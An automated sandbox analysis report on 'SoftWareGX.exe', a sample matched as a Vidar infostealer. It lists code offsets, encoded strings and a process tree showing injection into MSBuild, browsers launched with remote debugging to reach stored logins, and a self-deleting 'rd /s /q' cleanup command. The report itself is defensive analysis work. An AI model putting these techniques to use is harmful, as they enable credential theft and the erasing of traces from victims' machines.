                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041CB4115_2_0041CB41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041535115_2_00415351
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041AB6115_2_0041AB61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C36115_2_0041C361
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042736115_2_00427361
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425B1115_2_00425B11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A32115_2_0041A321
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00427B3115_2_00427B31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004143D115_2_004143D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004263D115_2_004263D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041CBE115_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004243E115_2_004243E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004253E115_2_004253E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426BE115_2_00426BE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00428B9115_2_00428B91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425BB115_2_00425BB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425C4115_2_00425C41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00413C6115_2_00413C61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A41115_2_0041A411
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041541115_2_00415411
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C43115_2_0041C431
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00416C3115_2_00416C31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040343115_2_00403431
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426CC115_2_00426CC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425CE115_2_00425CE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004154F115_2_004154F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415C8115_2_00415C81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042748115_2_00427481
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041649115_2_00416491
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042649115_2_00426491
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004244A115_2_004244A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A4B115_2_0041A4B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00414D4115_2_00414D41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040354115_2_00403541
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042755115_2_00427551
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042955E15_2_0042955E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00428D1115_2_00428D11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040FDC015_2_0040FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C5D115_2_0041C5D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004255E115_2_004255E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041DDE715_2_0041DDE7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415D8115_2_00415D81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00413D8115_2_00413D81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042658115_2_00426581
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041AD9115_2_0041AD91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00424DA115_2_00424DA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00427DA115_2_00427DA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004155B115_2_004155B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041464115_2_00414641
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042BE4215_2_0042BE42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00415E5115_2_00415E51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041565115_2_00415651
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042465115_2_00424651
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042665115_2_00426651
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00424E6115_2_00424E61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042867115_2_00428671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426E0115_2_00426E01
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A61115_2_0041A611
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041662115_2_00416621
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042762115_2_00427621
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00425ED115_2_00425ED1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004146E115_2_004146E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00415EF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004156F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00414E91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00426EA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041C741
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00425751
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0042CF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00425F71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00427771
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00424F11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00424711
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00414F21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00427F21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004267C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00416F81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00426F91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00402FB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00424FB1
                Source: SoftWareGX.exe, 00000005.00000002.1306078094.0000000006110000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamem3uz1vzd.dll4 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1306526422.0000000006B50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMercado.exe0 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMercado.exe0 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameyomkssf4.dll4 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1304719584.0000000001F9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamem3uz1vzd.dll4 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1306553287.0000000006B60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameyomkssf4.dll4 vs SoftWareGX.exe
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D57000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMercado.exe0 vs SoftWareGX.exe
                Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: SoftWareGX.exe, uBQRQemRwragayxWIgNspKbnCcaXv.cs | Base64 encoded string: 'UjOLnpsOJjNzssPOxvSoj1eKmz8vkCIys4dDTFLHahANWrfYOnRN4T+GbEUicJ0iPvGd8+nwwnYnLgNudsHtBLsqZ00Xo1cdp6i8KFSMIMK5MSLzf5uVjAksjlgO6fC/nv8nrIJaz2T7sF843NNYO9zQsx6M9iZWpG9IXvqOUFY7XElBC3JXOmXV6sMFuF/ofc7/o7kk/KGSyDxOTwDQAEFO5nvwR1VYNlKI1Dcba7Jjz5nx9irdjdPh49J+As5hfc7/o7kk/KFgUNUzr+u1ODSgWHK7L2iCIsRQvQICfjJcv7Q0NY+WMf20fUDUiwRGFrAteBaQC0Ymh4SO4VK4/7ukw+drkc2A6UYwlwPH3oTAqwuUGSFVrfL2uARqPN0uuTb/NHKiPmo+2t9i+WVkyxStZ/HNPDxDi7f4opyBinnlL04xb5iWmx74x7GC3AeXDmpJrIpfCLl3nbKRNfkucR6g3COiRFcbqBi+Ltrp+XxcXQqU9hf2UVaQhUDsNlQArVagZGQrXUeqqevEcSK4LUWAzoKL/515HvjHsYLcB5d1bqbjY5CFmAksjlgO6fC/nv8nrIJaz2TdgpJyw0BJhXw4OZcRsgNwdNvwRwAYhld9zv+juST8oeUeNkGulXthEFI8bZ2aegVEGJE/t1j0L6Fih/BuSIpqX+YD2JZERLqd/Q6iGbvmi+VxFMqHYLqHf3VNoyNr3cR9zv+juST8oQhx8gojIC6QAeGXtwvwFGEPruJ4D9Z1MI++IhThja9tE28xRs5lWOkzsvVM5VXI5MBD6SDiDRk43VG1hY5ZHPd9zv+juST8oRzbvZts4YMCmmEdQugPAEwlbslN6hMpn6nA8VHcFDrcKEgYmxEae0yw/B9rYsv7u6xNrQcYfRyuO1xJQQtyVzpAm4v9QWJdfp1SEdeJMpZL'
                Source: 5.2.SoftWareGX.exe.6b50000.5.raw.unpack, Knvbl.cs | Base64 encoded string: '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
                Source: 5.2.SoftWareGX.exe.3d5a42c.1.raw.unpack, Knvbl.cs | Base64 encoded string: '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
                Source: 5.2.SoftWareGX.exe.3d6b958.2.raw.unpack, Knvbl.cs | Base64 encoded string: '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
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@103/328@30/49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041C0A0 CreateToolhelp32Snapshot,Process32First,Process32Next,TerminateProcess,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\3VV4VCED.htm
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
                Source: C:\Users\user\Desktop\SoftWareGX.exe | File created: C:\Users\user\AppData\Local\Temp\m3uz1vzd
                Source: SoftWareGX.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SoftWareGX.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: jwb1nycjm.15.dr, u3wl6p8ym.15.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SoftWareGX.exe | Virustotal: Detection: 13%
                Source: unknown | Process created: C:\Users\user\Desktop\SoftWareGX.exe "C:\Users\user\Desktop\SoftWareGX.exe"
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA88.tmp" "c:\Users\user\AppData\Local\Temp\m3uz1vzd\CSC1F5D4801F4546F0859A2F6C82D3A873.TMP"
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF054.tmp" "c:\Users\user\AppData\Local\Temp\yomkssf4\CSC4D1794474874449F96D662C038F0859C.TMP"
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=1952,i,15543430524352428538,12772607436740363522,262144 /prefetch:8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2136,i,9075986570920464694,11871487164673200351,262144 /prefetch:3
                Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4544 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\xl6pp" & exit
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6748 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline"
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline"
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA88.tmp" "c:\Users\user\AppData\Local\Temp\m3uz1vzd\CSC1F5D4801F4546F0859A2F6C82D3A873.TMP"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF054.tmp" "c:\Users\user\AppData\Local\Temp\yomkssf4\CSC4D1794474874449F96D662C038F0859C.TMP"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\xl6pp" & exit
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=1952,i,15543430524352428538,12772607436740363522,262144 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2136,i,9075986570920464694,11871487164673200351,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4544 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
